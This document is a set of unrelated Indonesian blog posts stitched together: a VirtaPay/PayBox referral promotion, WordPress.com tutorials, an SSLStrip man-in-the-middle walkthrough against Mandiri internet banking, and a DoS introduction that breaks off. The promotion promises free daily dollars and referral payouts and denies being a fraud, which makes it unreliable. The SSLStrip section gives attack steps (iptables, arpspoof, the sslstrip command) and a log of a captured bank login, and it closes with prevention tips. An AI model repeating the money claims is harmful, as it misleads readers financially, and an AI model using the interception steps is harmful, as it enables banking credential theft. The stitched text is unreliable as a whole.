1.postingan kali ini akan membahas  seputar pertnyaan2 dari sobat2 yg belom faham tentang virtapay .dibawah ini penjelasan singkat mengenai  virtapay teruslah membaca sampai ahir .

2. apaan tuh VIRTAPAY ????
PAYBOX / VIRTAPAY : mata uang online dan layanan proses pembayaran untuk melakukan transaksi jual beli online lebih mudah, lebih aman dan tersedia untuk semua orang.

3. apa fungsi dari VIRTAPAY ???
Saat ini akun VIRTAPAY hanya bisa dipakai untuk transaksi orang ke orang, namun demikian, kedepan fungsi VIRTAPAY jauh lebih dari itu, yang sedang dalam tahap pengembangan saat ini adalah :

• Mudah membeli dan menjual menggunakan akun VIRTAPAY.
• Mudah mengirim dan menerima uang menggunakan account VIRTAPAY.
• Pembelian dari hampir semua merchant online.
• Menarik untuk hampir semua rekening bank di seluruh dunia.
• Mungkin menarik untuk lainnya prosesor pembayaran online.
• integrasi Usaha Kecil, termasuk modul proses pembayaran untuk semua software shopping online
• integrasi dengan Bisnis tingkat menengah.
• Integrasi dengan Online Store besar.
• Kartu Debit PayBox yang terhubung ke account Anda
• pertukaran Mata Uang dengan semua mata uang utama dunia

4. kapan akun VIRTAPAY bisa mulai dipergunakan ???
akun VIRTAPAY bisa mulai dipergunakan dan berfungsi penuh sebagai virtual currency jika sudah launching (OPEN BOX). Saat ini masih pre-launching (CLOSED BOX), jadi sementara hanya bisa dipergunakan transaksi orang ke orang (person to person). launching (OPEN BOX) baru bisa dilakukan jika sudah tercapai taget jumlah member mencapai 2 – 5 juta orang di seluruh dunia.

5. Mengapa anda harus membuat akun VIRTAPAY sekarang …

• Anda mulai dengan saldo $ 25 dan gratis.
• PayBox akan menambah hingga $ 20 per hari ke dalam account Anda untuk berpartisipasi sebagai bagian untuk mempersiapkan peluncuran layanan baru kami.
• Anda mendapatkan $ 10 per orang yang Anda ajak bergabung dengan PayBox.
• Anda akan menjadi pengguna EarlyBird sebelum VIRTAPAY terbuka untuk umum.
• Anda akan membantu membentuk pengembangan sistem pembayaran terbaik yang pernah dirancang untuk Internet.
• Anda bisa memiliki ratusan atau ribuan dolar dalam account Anda pada saat kita memulai, tanpa pernah membuat deposit!

6. bagaimana Caranya Mendaftar di VIRTAPAY ?
Berikut urutan mendaftar PAYBOX, yg blm berhasil, tentu ada urutan yg terlewati/ msh salah, untuk memulai silahkan klik DISINI

• muncul halaman utama VIRTAPAY, terus CLICK HERE TO JOINT NOW
• masukkan / pilih username anda suka ( akan digunakan seterusnya untuk login ke wec VIRTAPAY ), tapi jangan pake spasi, harus kata sambung / satukata (boleh dg kombinasi angka)
• masukkan email anda.
• masukkan email anda lagi (emailnya harus sama)
• masukkan/ pilih password (angka saja yg mudah diingat hanya oleh anda) yg anda suka
• beri tanda centang (v) pada kotak kecil i agree to terms of service (setuju aturan VIRTAPAY)
• klik continue
• masukkan email lagi pada kolom seperti email yg diatas
• masukkan kode captcha sesuai karakter yg ada di sebelah
• oke
• buka/ masuk email anda yg diatas
• konfirmasi/ verifikasi email yg dari feedburner paybox
• buka halaman paybox dg alamat http://www.virtapay.com/
• masukkan username yg anda pilih di atas pada isian username
• masukkan password anda yg anda pilih diatas tadi pada isian password
• anda masuk di account paybox anda, di dalam sudah ada saldo dollar sebesar $25

Demikian ringkasan saya, semoga bisa membantu teman – teman yang masih bingung kenapa anda masuk di grup I LOVE PAYBOX. Anda patut berterima kasih kepada teman anda yang mau menambahkan anda ke grup I LOVE PAYBOX, tidak semua orang mendapatkan kesempatan emas ini

Berikut kutipan comment yg mendukung bisnis 5 milyar bukan penipuan… dan gw 98 % setuju dengan yg diutarakan… silahkan dibaca 

Tertarik?? kunjungi website-nya disini

* Wants to create a blog but isn’t quite sure where to start
* Needs help choosing a blog topic
* Wants to better understand how blogging works
* Is interested in attracting more blog visitors

Kilas balik sejenak. Saat blog panduan.wordpress.com dibuat, seingat saya baru ada fitur FAQ, dokumentasi dan support saja dari wordpress.com. Setelah lahirnya blog ini, kemudian baru muncul forum wordpress.com berbahasa Indonesia (resmi), blog-blog sejenis ini (bukan resmi wp.com), dan wordpress tv (resmi).

Well, dengan adanya learn.wordpress.com, semoga resources untuk belajar tentang wordpress semakin banyak.

source: http://panduan.wordpress.com/2011/01/30/panduan-wordpress-com-resmi-edisi-english/

Untuk berkomentar, sebagai newbie sekalipun, bagiku tidaklah masalah. Namun untuk bertukar link, aku merasa kebingungan, bagaimana caranya memasang link blog lain di blog aku? Akhirnya, dengan sedikit mencari-cari artikel di internet, aku dapat menemukan jawabannya.

Saat ini, ada beberapa teman yang menanyakan bagaimana caranya bertukar link? bagaimana caranya memasang link blog orang lain di blog kita? Dan untuk membantu teman-teman yang mungkin membutuhkan panduan cara memasang link, berikut akan aku tuliskan pengalamanku disini.

Sebelum mulai memasang link, pertama-tama tentukan dulu dimana tempat kita akan menaruh “koleksi link” dari teman-teman kita. Sebagai contoh di blog ini, aku menaruh link di sidebar sebelah kanan, dengan judul Friend List.

1. masuk ke dashboard wordpress
2. cari bagian Appearance di sidebar kiri, trus klik link widget
3. tambahkan widget “Text” (klik dan seret widget Text di bagian tengah halaman ke bagian kanan, akan terbuka kotak teks baru.
4. isikan pada bagian judul dengan kehendak anda, dalam blog ini aku memberinya judul Friend List.
5. pada body teks, isikan dengan kode berikut :
<ul>
<li><a href=”http://bewegaleri.wordpress.com“>Zona Berbagi Informasi</a></li>
<li><a href=”http://bel4j4r.wordpress.com“>Belajar WordPress</a></li>
<li><a href=”http://hapebewe.blogspot.com“>My Cellular Corner</a></li>
<li><a href=”http://filegratis2u.blogspot.com“>Berbagi File Gratis</a></li>
<li><a href=”url-link“>anchor teks</a></li>
</ul>

6. ganti tulisan warna merah (url/alamat blog), sesuai dengan url blog yang akan kamu pasang, ganti tulisan warna biru (anchor text) dengan tulisan yang ingin ditampilkan di blog kamu. tambah atau kurangi link pada contoh di atas sesuai kebutuhan.

7. simpan pekerjaan anda. Kini anda sudah punya koleksi link dan mulailah berburu tukar link untuk meningkatkan rangking blog.

source: http://bel4j4r.wordpress.com/2011/04/11/tutorial-wordpress-menambah-link-blog/

Widget adalah sebuah kotak yang berisi kode-kode di mana anda dapat memindahkan ke dalam sidebar di manapun anda mau

Anda dapat menggunakannya untuk personalisasi blog anda dan memperoleh informasi yg anda inginkan hanya dengan melihatnya dari widget sidebar.

Dimana letak Widget?
Dalam dasbor, klik ‘Tampilan/Presentation’ kemudian alihkan ke submenu maka akan ketemu yang namanya ‘Sidebar Widgets’ atau ‘Widget Kolom Sisi’

Cara menggunakan
Seret widget ke kolom sisi (sidebar) dari kotak utama widget dan pindahkan, atur peletakkannya sesuai keinginan anda sampai diperoleh layout yg dikehendai.

Cara membuka

Ketika anda menyeret sebuah widget ke dalam kolom sisi (sidebar) jika widget dapat diubah anda akan melihat ikon kecil kemudian.

Klik lah ikon kecil itu untuk membuka layar widget

Mencopot widget dari kolom sisi (siderbar)

Seret widget ke dalam kotak utama widgets yang ada di bagian bawah kemudian lepaskan.

≈

Ada 2 tipe widget – ada yang dapat diubah dan ada yang tidak dapat diubah (widget standar).

Widget-widget Standar
Semua ini akan tampil sama di setiap blog (namanya juga standar khan). Anda hanya dapat memiliki sebuah dari tiap widget ini. Anda tidak dapat mengubah tampilan dan kerjanya.

• Akismet
  Menunjukaan jumlah komentar spam yang berhasil ditangkap oleh Akismet
• Archives (Arsip)
  Tulisan yang pernah dibuat
• Blog stats (Statistik Blog)
  Angka yang menunjukkan jumlah pengunjung
• Calendar (Kalender)
  Menampilkan tanggal saat ini, termasuk tanggal saat kita melakukan pengiriman tulisan
• Categories (Kategori)
  Semua tulisan pada blog yg dikelompokkan dalam kategori. (Ingat – kategori yang kosong tidak ditampilkan)
• Links (Tautan)
  Tautan Blogroll (Ingat – Tautan yang tidak dikategorikan tidak akan muncul)
• Pages (Halaman)
  Jika anda ingin menampilkan halaman yang pernah dibuat pada kolom sisi widget. Jika anda ingin mengurutkan halaman yag pernah dibuat, cobalah ini.
• Meta
  Anda tidak harus menggunakan ini. Anda dapat masuk( log in) pada http://wordpress.com dengan menambahkan /wp-login.php ke alamat blog anda. Sebaiknya sih tetep ditampilkan sehingga kalau log ini tinggal klik login saja.
• Recent Posts (Tulisan Yang Baru lalu)
  10 Tulisan yang baru lalu
• Recent Comments (Komentar yang baru lalu)
  10 komentar yang pernah dibuat di blog anda
• Search (Pencarian)
  Mengijinkan orang untuk melakukan pencarian berdasarkan kata pada tulisan yang pernah kita buat
• Top Posts (Tulisan Teratas)
  Tulisan yang paling sering dikunjungi

Widget yang dapat diubah

Dengan widget ini anda dapat meletakkan beberapa informasi yang anda miliki atau dari layanan informasi lain.

• del.icio.us
  Jika anda memiliki layanan dari del.icio.us widget akan serasa sempurna. (maaf kurang ngerti apa maksudnya)
• Flickr
  Letakkan gambar yang anda miliki dalam blog anda.
• Meebo
  Ngobrol secara Online lewat blog anda
• RSS
  Tampilkan informasi dari sumber lain dalam kolom sisi (sidebar) anda
  
• Sonific
  Apakah ingin memainkan musik pada blog anda?
• Text (Teks)
  Kata-kata dan atau gambar yang ingin anda tampilkan.

Tambahan
Setelah melakukan perubahan widget dalam kolom sisi jangan lupa selalu KLIK tombol Simpan Perubahan yang ada di bagian sudut kanan itu. Mohon koreksi jika ada terjemahan yang kurang tepat.

source: http://panduan.wordpress.com/2007/02/18/apa-sih-widget-itu/

Buat Anda yg pemula banget dan pingin punya blog sendiri, barusan (21 Oktober 2006 pukul 3:22 PM) ndapetin Tutorial Bikin Blog di WordPress.com diperuntukkan buat siapa saja yg baru kenal dengan wordpress.com. Siapa saja bisa download dari sumbernya langsung dengan klik di sini. Jika pada link tadi gagal mendownload/membukanya alternatifnya bisa mendownloadnya di sini.

Lebih lanjut dari tutorial tersebut, saya tambahkan catatan kecil yg saya buat sesuai dengan pengalaman.

1. Postingan yang kelewat panjang sebaiknya di putus, tidak perlu ditampilkan semua. Caranya tempatkan kursor pada bagian kalimat yg ingin diputus lalu tekan Alt+Tatawa klik tool bar Rich Text Editor dengan gambar kertas terpotong (kali yah) .

2. Jika ingin mengganti kata-kata pemutus standar, pindah mode dari mode editor ke mode html trus cari tulisan <!–more–> (tanda lebih kecil, tanda seru, 2 garis datar, MORE, 2 garis datar, tanda lebih besar) lalu sisipkan kata-kata yg kita kehendaki, misalnya menjadi <!–more …baca lebih lanjut–> maka pada bagian pemutus nantinya akan muncul tulisan “…baca lebih lanjut”.

3. Pakai shortcut key juga bisa, kalo pingin tahu pindahkan pointer mos di atas toolbar Rich Text Editor. Tapi bagi yg suka tulisan rata kiri-kanan (justify) pakai shortcut Alt+Jkarena ini tidak tersedia di toolbar secara langsung.

4. Untuk memunculkan/menyembunyikan Advanced Toolbar pada Rich Text Editor (pemformatan, pewarnaan font, insert karakter khusus, undo-redo, dll) tekan Alt+V.
   

5. Alt+E untuk switch antara mode editor dan mode html.
6. Jika browser yg kita pakai adalah FIREFOx 2.0 biasanya semua fungsi ALT+… gak berfungsi, maka kombinasi aja dengan Shift menjadi Shift+Alt+…
7. Shift+Enter untuk menyisipkan baris pemutus dalam paragraph.

8. Tampilan blog sepenuhnya ditentukan oleh theme yg kita pilih. Dari Menu Presentation terdapat sub menu yg ada tergantung dari masing-masing theme yg tersedia. Theme-theme itu ada yg bisa di kostumasi dan ada yg tidak. Untuk review themes2 itu bisa dilihat di sini. Beberapa yg bisa seperti yg saya pakai ini, kita bisa mengganti image header (biasanya ukurannya 730 x 140 pixel) dengan buatan sendiri.

   Kemudian yg kedua adalah submenu Sidebar Widgets, disini kita bisa banyak melakukan kustomasi. Dengan drag and drop widgets bisa dipindahkan ke dalam sidebar kemudian menatanya sesuai kehendak kita.

   Selanjutnya tinggal mengkonfigurasinya dengan klik bagian kanan dari widgets, mengisikan hal2 yg diperlukan. Widgets setiap theme bisa berbeda-beda. Kita juga bisa mengkostumasi TEXT widgets sepenuhnya dengan kata2 atau tag html yg bisa diterima WP.com termasuk membuat link. Widgets yg tersedia maksimal 10 hanya tidak ditampakkan, kita bisa menambahkannya dengan mengisi list pada bagian bawah TEXT WIDGETS. Demikian juga untuk RSS Feed Widgets.

9. Untuk upload file (misalnya: jpg, jpeg, png, gif, pdf, doc, ppt) masuk ke dashboad, atau bisa langsung klik new post. Lihat bagian bawah rich text editor ada tempat untuk upload file. Klik browse untuk mencari file yg akan di upload dari komputer kita. Isi judul/title dari file yg akan diupload. kalao perlu isikan deskripsi/keterangannya. Langkah berikutnya klik Upload yg ada di bagian kanan bawah deskripsi.
   Pastikan anda menjumpai submenu berikutnya, biasanya masuk ke sub menu cari di bagian upload tadi (ini saya contohkan upload file *.doc). Nah coba tempatkan pointer mouse di atas nama file yg di-upload tadi, klik kanan dan copy linknya. Itulah letak file upload-an tadi. Selanjutnya untuk mengaksesnya bisa dibuatkan link di bagian postingan atau di halaman lain atau di text widgets. Terus anda masih diberi tawaran radio button untuk memilih model link file/page/none dan bisa diedit lagi file tersebut.
   Untuk cara upload file gambar bisa dilihat di sini, di faq-nya WP.com

10. Bila diperlukan kita bisa back-up blog kita, ini untuk antisipasi kalo suatu saat ada masalah dengan wordpress.com. Caranya pakai aja software websitecopier salah satunya seperti WinHTTrack~Graties. Kalau belum punya WinHTTrack bisa download dari sini, untuk under linux downloadnya di sini. Cara pakainya simple aja kok, baca aja di help-nya.

source: http://panduan.wordpress.com/2007/02/18/tips-nge-blog/

1. Ketikkan ==> id.wordpress.com <== di kotak alamat (addres) di browser anda, terus enter. Menggunakan tulisan “id” agar antar muka (bahasa pengantar) berbahasa Indonesia. Akan muncul halaman seperti dibawah ini.
   • 
2. Klik kotak dengan latar biru yang didalamnya tertulis “Mulailah Blog WordPress Anda”. Sesaat kemudian akan terbuka halaman seperti dibawah ini.
   • 
3. Ikuti petunjuk yang ada pada halaman ini, Tuliskan nama (ini akan menjadi panduan.wordpress.com jika pada kotak nama pengguna ini diisi panduan) boleh huruf besar atau huruf kecil, gak masalah.
   Demikian pula Alamat Emailnya, ini harus alamat email yg masih aktif. Jangan lupa beri tanda centang (check) dengan nge-klik kotak kecil di samping Celotehan Legal. Klik Tombol Berikutnya>>. Akan muncul halaman seperti di bawah ini.
   • 

   Jika nama pengguna sudah terpakai oleh orang lain, anda harus mengganti/mengubah nama pengguna yang diisikan. Perhatikan bagian yang terblok dengan warna merah, itu yang harus diperbaiki.

4. Otomatis pada kotak Domain Blog: terisi nama pengguna yang diisikan tadi. Isikan Judul Blog: Sesuaikan dengan tema blog yang akan anda pakai. Untuk sementara biarkan saja pilihan bahasa kecuali anda mau pakai bahasa lain. Demikian juga Pribadi, biarkan tercentang agar blog anda bisa dikenali mesin perambah Seperti google atau yg lain. Klik Tombol Daftar >> .
5. Jika pendaftaran anda berhasil maka akan muncul halaman seperti di bawah ini.
   • 

   Selanjutnya anda bisa mengisi profil anda. Sebenarnya gak usah diisi dulu juga tidak papa, bisa diperbahurui nanti. Tapi yah tidak ada salahnya diisi juga, sambil nunggu proses pengiriman ke email anda dari wordpress untuk mendapatkan kode aktifasi. Silahkan Simpan Profil Anda.

6. Buka kotak masuk di alamat email anda. Contohnya seperti di email saya seperti ini.
   • 

   Selanjutnya Ikuti petunjuk dengan meng- klik link yang diberikan untuk mengaktifasi blog yang dibuat.

7. Sampai di sini anda akan diberikan password, jangan lupa kopi/salin password untuk login.
   • 

   Klik Login untuk siap-siap masuk ke blog anda.

8. Jika login berhasil seharusnya anda dihadapkan ke layar di mana pada bagian layar tadi terdapat bagian seperti pada gambar ini.
   • 

   Klik saja nama blog anda itu. sampai anda di bawa ke dashboard.

9. Langkah selanjutnya adalah mengubah password sehingga mudah diingat. Klik My Profil bagian pojok kanan atas.
   

   Selanjutnya sekalian ubah bahasa antarmuka (Interface language) ke bahasa Indonesia. Klik Save Changes. Jika berhasil maka bahasa interfacenya berubah menjadi bahasa Indonesia.

10. Sampai di sini anda telah berhasil memiliki blog, selanjutnya bisa dimodifikasi lewat dasbor, termasuk mengisi blog anda nantinya.

Untuk selanjutnya jika anda hendak masuk ke blog anda ada beberapa pilihan yang bisa ditempuh:

• Ketikkan alamat blog anda di address browser: Misalnya “panduan.wordpress.com” (tanpa tanda petik), jika telah terbuka, silahkan klik login dibagian kolom sisi blog anda. Isikan nama dan password, klik login.
• Pada address browser anda ketikkan saja wordpress.com/wp-admin, setelah terbuka sebuah halaman, disitu isikan nama dan password dan klik login.
• Ketikkan pada address browser “wordpress.com” begitu halaman terbuka, isikan nama dan password dibagian kotak yang tersedia, klik login.

Untuk anda yang berniat membuat blog di wordpress.com dan memerlukan panduan silahkan mendownloadnya dari di sini.

source: http://panduan.wordpress.com/2007/02/18/cara-mendaftar-untuk-membuat-blog-di-wordpresscom/

SSL is not vulnerable to MITM attack

MITM attack adalah serangan dimana attacker berada di tengah bebas mendengarkan dan mengubah percakapan antara dua pihak. Jadi dengan serangan MITM ini attacker tidak hanya pasif mendengarkan, tetapi juga aktif mengubah komunikasi yang terjadi. Sebagai contoh, pada percakapan antara Alice dan Bob, Charlie menjadi pihak yang ditengah melakukan MITM attack. Charlie tidak hanya bisa mendengarkan percakapan itu, namun juga bisa mengubah percakapannya. Ketika Alice berkata “Besok makan siang jam 7″, Charlie bisa mengubahnya menjadi “Besok makan siang dibatalkan” sehingga Bob mengira makan siang dengan Alice tidak jadi.

Kenapa MITM attack bisa terjadi? MITM attack bisa terjadi karena sebelum berkomunikasi kedua pihak tidak melakukan authentication. Authentication berguna untuk memastikan identitas pihak yang berkomunikasi, apakah saya sedang berbicara dengan orang yang benar, atau orang ke-3 (the person in the middle) ? Tanpa authentication Alice akan mengira sedang berbicara dengan Bob, sedangkan Bob juga mengira sedang berbicara dengan Alice, padahal bisa jadi sebenarnya Alice sedang berbicara dengan Charlie dan Bob juga sedang berbicara dengan Charlie, sehingga Charlie bertindak sebagai “the person in the middle”. Seharusnya sebelum Alice dan Bob berbicara, harus ada authentication, untuk memastikan “Who are you speaking with?”. Alice harus memastikan “Are you really Bob? Prove it!”, sedangkan Bob juga harus memastikan “Are you really Alice? Prove it!”.

SSL adalah protokol yang memiliki tingkat keamanan sangat tinggi. SSL tidak hanya mengatur tentang enkripsi, namun juga mengatur tentang authentication sehingga SSL tidak rentan terhadap serangan man in the middle. SSL menggunakan sertifikat yang memanfaatkan kunci publik dan kunci private sebagai cara untuk melakukan authentication. Dengan menggunakan sertifikat SSL ini, pengunjung web bisa yakin sedang berkomunikasi dengan web server yang benar, bukan attacker in the middle yang menyamar menjadi web server suatu situs.

Attacker yang mencoba menjadi “the person in the middle”, akan dengan mudah ketahuan karena attacker tidak bisa membuktikan identitasnya dengan sertifikat SSL yang sah. Sertifikat SSL yang sah haruslah ditandatangani oleh CA (certificate authority) yang dipercaya dan tersimpan dalam daftar trusted CA browser. Jadi bila attacker mencoba membuat sertifikat SSL sendiri, browser akan memberi peringatan keras pada pengunjung bahwa sertifikat SSL tidak bisa dipercaya dan pengunjung disarankan untuk membatalkan kunjungan karena beresiko terkena serangan mitm. Serangan mitm attack baru bisa berhasil bila pengunjung tetap bandel dan nekat untuk menggunakan sertifikat palsu tersebut. Bila ini yang terjadi, maka kesalahan ada pada pengguna, bukan kelemahan SSL sebagai protokol. Lebih detil tentang https silakan baca Understanding Https.

HTTPS vs HTTP, Trusted vs Untrusted

http adalah protokol yang tidak bisa dipercaya karena rentan terhadap serangan mitm. Sedangan http over SSL (https) adalah protokol yang bisa dipercaya karena protokol ini tidak rentan terhadap serangan mitm. Informasi yang dilihat  pengunjung pada browser di sebuah page http sebenarnya tidak bisa dipercaya karena tidak ada jaminan integritas dan keontentikan data. Informasi tersebut kemungkinan sudah diubah di tengah jalan atau berasal dari sumber yang tidak otentik (orang lain). dan pengunjung tidak bisa melakukan verifikasi.

Sedangkan informasi yang dilihat pengunjung pada browser di sebuah halaman https bisa dipercaya karena DIJAMIN informasi yang diterima adalah sama dengan yang dikirim web server dan informasi tersebut juga DIJAMIN dikirim oleh web server yang benar. Dulu saya pernah menulis artikel tentang Trusted vs Untrusted klikBCA, yang menjelaskan tentang adanya dua subdomain yang berbeda, yang trusted menggunakan https dan yang untrusted menggunakan http.

HTTP as Gate to HTTPS

Jarang sekali orang mengunjungi situs dengan mengetikkan https:// bahkan http:// pun orang sudah malas. Kebanyakan orang langsung mengetikkan alamat situs yang ditujunya tanpa harus diawali dengan http:// atau https://. Secara default browser akan berasumsi bahwa pengunjung akan menggunakan protokol http, bukan https bila pengunjung tidak menyebutkan protokolnya.

Kebanyakan situs yang harus memakai https, memang dirancang untuk menerima request melalui http (port 80) atau https (port 443). Situs pada port 80 biasanya hanya dijadikan jembatan untuk menuju situs yang sebenarnya pada port 443. Bila pengunjung masuk melalui port 80, maka server akan memberikan link untuk menuju URL https, atau dengan memberikan response Redirect.

Jadi bisa disimpulkan bahwa sebagian besar pengunjung memasuki https dengan melalui http, dengan kata lain http sebagai gerbang menuju https. Metode peralihan dari situs http ke situs https ada beberapa cara, yaitu:

• Memberikan link menuju URL https.
• Memberikan response redirect ke URL https.
• Menggunakan META tag auto refresh ke URL https.
• Menggunakan javascript untuk load halaman https.

Attacking HTTP, not HTTPS

Sebelumnya sudah saya jelaskan bahwa https adalah protokol yang sangat secure sehingga tidak bisa diserang dengan serangan mitm. Namun mengingat kenyataan bahwa kebanyakan orang mengakses https melalui http, maka attacker memiliki peluang untuk menyerang ketika pengunjung masih berada dalam protokol http.

SSLStrip adalah tool untuk melakukan mitm attack pada protokol http  (bukan HTTPS), dengan maksud untuk menyerang situs-situs yang dilindungi dengan https. SSLStrip sebagai “the person in the middle”, akan mencegah peralihan dari http ke https dengan secara aktif mengubah response dari server sehingga pengunjung akan tetap berada dalam protokol http.

Mari kita lihat beberapa cara peralihan dari http ke https, saya tambahkan cara SSLStrip mencegah peralihan itu:

• Memberikan link menuju URL https: SSLStrip akan mengubah link berawalan https menjadi http. Sehingga yang muncul di browser korban bukan link ke https melainkan link ke http.
• Memberikan response redirect ke URL https: SSLStrip akan mengubah header Location dari URL berawalan https menjadi http.
• Menggunakan META tag auto refresh ke URL https: SSLStrip akan mengubah url https menjadi http.
• Menggunakan javascript untuk load halaman https: SSLStrip akan mengubah url https menjadi http.

Untuk lebih jelasnya berikut adalah gambar yang menunjukkan salah satu cara kerja SSLStrip mencegah korban beralih dari http ke https.

Pada gambar di atas korban mengakses web server bank dengan URL http://bank/. Request tidak secara langsung dikirim ke web server, namun melalui SSLStrip dulu. SSLStrip meneruskan request tersebut ke web server. Kemudian web server menjawab dengan memberikan html berisi link ke URL https://bank/login/ kepada SSLStrip. Sebelum response html diterima oleh browser, SSLStrip mengubah response tersebut dengan mengubah URL https menjadi http biasa sehingga HTML yang diterima di browser korban berisi link ke URL http://bank/login/ bukan https://bank/login/.

Korban mengklik link pada halaman yang muncul browsernya, tentu saja link ini bukan ke https://bank/login/ melainkan ke http://bank/login/. Dengan cara ini browser tetap dalam protokol http bukan dalam protokol https seperti seharusnya, dengan kata lain SSLStrip berhasil mencegah browser beralih ke protokol https. Request ke http://bank/login/ tersebut dikirimkan ke SSLStrip. Kemudian SSLStrip tidak meneruskan request tersebut ke http://bank/login/, melainkan membuat request baru ke https://bank/login/. Kemudian web server mengirimkan response dari response tersebut ke SSLStrip. Seperti biasanya SSLStrip akan mengubah response dari server tersebut untuk mencegah peralihan ke https. Response yang telah diubah ini kemudian dikirimkan ke browser korban sehingga korban tetap melihat halaman yang sama persis seperti ketika dia membuka https://bank/login/. Dengan tampilan yang sama persis ini, korban mengira sedang membuka https://bank/login/, padahal sebenarnya dia sedang membuka http://bank/login/. Perhatikan bahwa koneksi antara browser dengan SSLStrip adalah dalam http biasa, sedangkan dari SSLStrip ke web server dalam https.

Setelah muncul halaman login dan korban mengira sedang membuka https://bank/login, kemudian korban memasukkan username dan password dan mengklik tombol Login. Browser akan membuat POST request ke http://bank/login/ yang diterima oleh SSLStrip. Karena protokolnya adalah http, maka SSLStrip dengan mudah bisa membaca username dan password yang dimasukkan korban. SSLStrip kemudian akan mengirimkan username dan password korban degan POST request ke https://bank/login/.  Seperti biasa jawaban dari webserver akan dimodifikasi dulu seperlunya oleh SSLStrip sebelum dikirimkan ke browser korban.

Perhatikan bahwa korban sejak awal hingga login mengakses situs dengan http, sedangkan SSLStrip di tengah-tengah membuat koneksi https ke web server yang sebenarnya. Jadi walaupun browser mengakses dengan http, namun response yang diterima browser berasal dari koneksi https yang dibuat oleh SSLStrip.

Case Study: Mandiri Internet Banking

Mari kita coba trik di atas dengan contoh kasus pada situs internet banking Mandiri. Karena ini hanya contoh, saya tidak menggunakan teknik ARP Spoofing untuk melakukan MITM attack yang sesungguhnya. Saya sengaja mengubah setting browser saya agar menggunakan proxy, yaitu SSLStrip. Dalam website SSLStrip, disebutkan seharusnya cara untuk melakukan MITM attack dengan SSLStrip adalah:

• Setting komputer agar bisa melakukan forwarding paket
• Setting iptables untuk mengarahkan traffic HTTP ke SSLStrip
• Jalankan SSLStrip
• Gunakan ARPSpoof untuk meyakinkan jaringan bahwa traffic harus dikirimkan melalui komputer yang menjalankan SSLStrip.

Dalam contoh ini saya tidak melakukan ARPSpoofing, namun saya menggunakan SSLStrip sebagai proxy yang saya setting dalam browser saya. Sehingga setiap traffic http yang dilakukan browser saya akan dikirimkan melalui SSLStrip sebagai man in the middle.

Saya menjalankan SSLStrip di linux dengan IP address 192.168.0.10. Cara menjalankannya mudah sekali, cukup jalankan perintah: python sslstrip.py -l portnumber . Kemudian pada browser saya setting untuk menggunakan proxy 192.168.0.10 dan port sesuai dengan port sslstrip. Untuk lebih jelasnya, perhatikan gambar di bawah ini:

Setelah semuanya siap, mari kita coba melakukan serangan mitm. Pada skenario ini, korban akan login ke Mandiri IB tidak dengan mengetikkan https://ib.bankmandiri.co.id, karena korban hanya hafal bankmandiri.co.id saja maka korban langsung mengetikkan bankmandiri.co.id (tanpa diawali www atau http://). Secara default browser akan menganggap korban menghendaki koneksi dengan protokol http, bukan https. Request http tersebut dikirimkan melalui SSLStrip sebagai man in the middle, dan berikut adalah response yang diterima di browser korban. Sebagai pembanding saya juga berikan gambar screenshot halaman depan bank mandiri yang asli (tidak dimodifikasi sslstrip).

Login ke Mandiri IB dilakukan dengan mengklik tombol Login di halaman depan bank mandiri. Login tersebut sebenarnya adalah link ke URL https, namun SSLStrip mengubahnya menjadi http agar korban tidak beralih ke modus https. Berikutnya korban akan mengklik tombol Login, sehingga browser akan mengakses URL http://ib.bankmandiri.co.id (bukan https://). Berikut adalah gambar screenshot halaman login Mandiri IB yang telah dimodifikasi sslstrip dan yang masih asli. Kedua gambar di bawah ini sangat mirip, perbedaannya hanya pada penggunaan awalan http:// dan https://. Saya yakin kebanyakan orang tidak akan menyadari bahwa dia sedang menggunakan http biasa, bukan https.

Berikutnya setelah bertemu dengan halaman login, korban akan dengan senang hati memasukkan username dan password. Request tersebut dikirimkan dalam request POST http (bukan https) ke sslstrip. Karena POST dikirim melalui http, maka sslstrip bisa dengan mudah menyimpan username dan password korban.Berikut ini adalah log dari sslstrip yang menangkap username dan password Mandiri IB.

1
2
3

2009-05-06 12:00:43,339 Sending header: content-type: application/x-www-form-urlencoded
2009-05-06 12:00:43,339 Sending header: proxy-connection: Keep-Alive
2009-05-06 12:00:43,339 POST Data (ib.bankmandiri.co.id): action=result&userID=sensordong&password=rahasiabangetsensor&image.x=79&image.y=20

Setelah itu sslstrip akan mengirimkan username dan password korban dalam POST request ke URL https (ini adalah url submit yang asli). Response yang diberikan oleh webserver Mandiri IB akan dimodifikasi seperlunya dan dikembalikan ke browser korban. Bila login berhasil, maka korban akan melihat tampilan seperti gambar dibawah ini, sebagai pembanding saya juga sertakan gambar bila menggunakan protokol https.

Seperti pada halaman login, halaman setelah login berhasil juga sama persis walaupun menggunakan protokol http. Korban tidak akan menyadari bahwa dia sedang menggunakan http, bukannya https karena tampilannya memang tidak ada bedanya.

Tips Pencegahan

Serangan mitm dengan sslstrip ini dilakukan dengan memanfaatkan kemalasan pengguna untuk langsung menggunakan https. Pengguna yang malas memilih untuk menggunakan http biasa dan berharap di-redirect ke url https otomatis atau menemukan link ke url https. Padahal pada saat pengguna menggunakan http biasa itulah pengguna berpotensi terkena serangan mitm. Bila pengguna langsung menggunakan https, maka pengguna akan aman dan terbebas dari serangan mitm. Jadi mulai sekarang biasakanlah mengetikkan https:// di URL anda bila ingin mengakses situs yang sensitif.

source: http://www.ilmuhacking.com/web-security/mitm-attack-mandiri-internet-banking-using-sslstrip/

Apa itu DoS

Denial of service adalah jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya menikmati layanan yang diberikan server. Server sesuai namanya adalah pelayan yang harus selalu siap melayani permintaan pengguna, yang umumnya beroperasi 24 jam tanpa henti. Contohnya adalah web server yang bertugas melayani pengunjung web menyediakan informasi dalam bentuk halaman html. Dalam kondisi normal, pengunjung dapat meminta resource dari web server untuk ditampilkan dalam browsernya, namun bila web server terkena serangan DoS maka pengunjung tidak bisa menikmati layanan web server.

Secara umum ada 2 cara melakukan serangan DoS:

1. Mematikan Server
2. Menyibukkan Server
   • Tanpa bug/vulnerability
   • Meng-exploit bug/vulnerability

DoS dengan Mematikan Server: Kill Them!

Anda pernah mengalami ingin memakai telepon umum atau ATM namun tidak bisa karena di mesin tersebut ditempel kertas berisi pesan “Out of Service” atau “Sedang dalam perbaikan”. Telepon umum adalah target serangan DoS yang biasa terjadi, dimana-mana kita menemukan telpon umum yang rusak karena serangan DoS seperti membanting gagang telpon, mencabut kabel, memecahkan LCD dan aksi-aksi lainnya.

Tujuan serangan ini adalah membuat server shutdown, reboot, crash, “not responding”. Jadi serangan ini menghasilkan kerusakan yang sifatnya persisten artinya kondisi DoS akan tetap terjadi walaupun attacker sudah berhenti menyerang, server baru normal kembali setelah di-restart/reboot.

